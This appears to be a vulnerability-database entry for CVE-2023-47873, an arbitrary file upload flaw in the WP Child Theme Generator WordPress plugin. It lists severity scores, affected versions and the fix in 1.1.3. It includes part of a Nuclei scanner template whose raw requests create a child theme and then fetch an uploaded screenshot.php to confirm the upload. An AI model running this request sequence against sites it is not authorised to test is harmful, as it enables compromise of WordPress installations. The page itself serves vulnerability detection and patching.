CVE-2023-47873
published 2024-03-26
CVE-2023-47873: Unrestricted Upload of File with Dangerous Type vulnerability in WEN Solutions WP Child Theme Generator. This issue affects WP Child Theme Generator: from n/a…
Priority: P3 52 · high · 7.2 (CVSS 3.1)
AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 2.28% (80.9th percentile)
Unrestricted Upload of File with Dangerous Type vulnerability in WEN Solutions WP Child Theme Generator. This issue affects WP Child Theme Generator: from n/a through 1.0.9.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wen_solutions | wp_child_theme_generator | n/a – 1.0.9 | — |
| wensolutions | wp_child_theme_generator | < 1.1.3 | 1.1.3 |
No detection rules found.
Nuclei
WordPress WP Child Theme Generator < 1.1.3 - Arbitrary File Upload
nuclei·CVSS 7.2
CVE-2023-47873 [HIGH] WordPress WP Child Theme Generator < 1.1.3 - Arbitrary File Upload
WordPress WP Child Theme Generator
```yaml
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="wp-easy-nonce"
        {{nonce}}
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="action"
        child_theme
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="custom-child-create"
        Create Child Theme
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8--
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(location, "error_type=updated")'
        condition: and
        internal: true
  - raw:
      - |
        GET /wp-content/themes/{{name}}/screenshot.php HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{string}}")'
        condition: and
# digest: 4b0a00483046022
```
No writeups or analysis indexed.
https://patchstack.com/database/vulnerability/wp-child-theme-generator/wordpress-wp-child-theme-generator-plugin-1-0-8-arbitrary-file-upload-vulnerability?_s_id=cve
Published: 2024-03-26